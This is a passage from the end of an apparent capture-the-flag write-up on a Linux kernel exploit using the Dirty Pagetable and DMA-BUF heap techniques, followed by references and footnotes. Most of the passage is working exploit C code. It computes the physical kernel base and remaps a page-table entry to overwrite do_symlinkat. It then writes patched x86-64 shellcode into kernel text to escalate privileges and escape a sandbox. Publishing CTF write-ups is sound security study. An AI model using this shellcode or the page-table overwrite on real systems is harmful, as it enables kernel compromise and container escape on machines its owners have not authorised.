      break;
    }
  }
  if (wwwbuf == NULL) fatal("victim page table not found");
  size_t phys_base = ((*(size_t*)wwwbuf) & ~0xfff) - 0x1c04000;
  printf("[+] Physical kernel base address: 0x%016lx\n", phys_base);

  /**
   * Overwrite do_symlinkat
   */
  puts("[+] Overwriting do_symlinkat...");
  size_t phys_func = phys_base + 0x24d4c0;
  *(size_t*)dmabuf = (phys_func & ~0xfff) | 0x8000000000000067;
  char shellcode[] = {0xf3, 0x0f, 0x1e, 0xfa, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x5f, 0x49, 0x81, 0xef, 0xc9, 0xd4, 0x24, 0x00, 0x49, 0x8d, 0xbf, 0xd8, 0x5e, 0x44, 0x01, 0x49, 0x8d, 0x87, 0x20, 0xe6, 0x0a, 0x00, 0xff, 0xd0, 0xbf, 0x01, 0x00, 0x00, 0x00, 0x49, 0x8d, 0x87, 0x50, 0x37, 0x0a, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc7, 0x49, 0x8d, 0xb7, 0xe0, 0x5c, 0x44, 0x01, 0x49, 0x8d, 0x87, 0x40, 0xc1, 0x0a, 0x00, 0xff, 0xd0, 0x49, 0x8d, 0xbf, 0x48, 0x82, 0x53, 0x01, 0x49, 0x8d, 0x87, 0x90, 0xf8, 0x27, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc3, 0x48, 0xbf, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x49, 0x8d, 0x87, 0x50, 0x37, 0x0a, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x98, 0x40, 0x07, 0x00, 0x00, 0x31, 0xc0, 0x48, 0x89, 0x04, 0x24, 0x48, 0x89, 0x44, 0x24, 0x08, 0x48, 0xb8, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x48, 0x89, 0x44, 0x24, 0x10, 0x48, 0xb8, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x48, 0x89, 0x44, 0x24, 0x18, 0x48, 0xb8, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x48, 0x89, 0x44, 0x24, 0x20, 0x48, 0xb8, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0xb8, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x48, 0x89, 0x44, 0x24, 0x30, 0x49, 0x8d, 0x87, 0x41, 0x0f, 0xc0, 0x00, 0xff, 0xe0, 0xcc};

  void *p;
  p = memmem(shellcode, sizeof(shellcode), "\x11\x11\x11\x11\x11\x11\x11\x11", 8);
  *(size_t*)p = getpid();
  p = memmem(shellcode, sizeof(shellcode), "\x22\x22\x22\x22\x22\x22\x22\x22", 8);
  *(size_t*)p = (size_t)&win;
  p = memmem(shellcode, sizeof(shellcode), "\x33\x33\x33\x33\x33\x33\x33\x33", 8);
  *(size_t*)p = user_cs;
  p = memmem(shellcode, sizeof(shellcode), "\x44\x44\x44\x44\x44\x44\x44\x44", 8);
  *(size_t*)p = user_rflags;
  p = memmem(shellcode, sizeof(shellcode), "\x55\x55\x55\x55\x55\x55\x55\x55", 8);
  *(size_t*)p = user_rsp;
  p = memmem(shellcode, sizeof(shellcode), "\x66\x66\x66\x66\x66\x66\x66\x66", 8);
  *(size_t*)p = user_ss;

  memcpy(wwwbuf + (phys_func & 0xfff), shellcode, sizeof(shellcode));
  puts("[+] GO!GO!");

  printf("%d\n", symlink("/jail/x", "/jail"));

  puts("[-] Failed...");
  close(fd);

  getchar();
  return 0;
}

Yay!

References

1: Linux Slab Allocator - About slab allocator
2: 手を動かして理解するLinux Kernel Exploit - About Dirty Cred
3: Dirty Pagetable: A Novel Exploitation Technique To Rule Linux Kernel - The original article explaining about Dirty Pagetable
4: DMA-BUF Heaps - About DMA-BUF Heap
5: CoRJail: From Null Byte Overflow To Docker Escape Exploiting poll_list Objects In The Linux Kernel - How to bypass nsjail

*1:Team name consists of st98, weak ptr-yudai, and keymoon.

*2:We can actually call it multiple times due to the lack of a mutex, but it's not necessary.

*3:Allocation and release take place in the same function in this case, but it doesn't matter since we will free all objects in ④ eventually.

*4:The file structure is actually much larger in size.

*5:Refer to [3] for more details.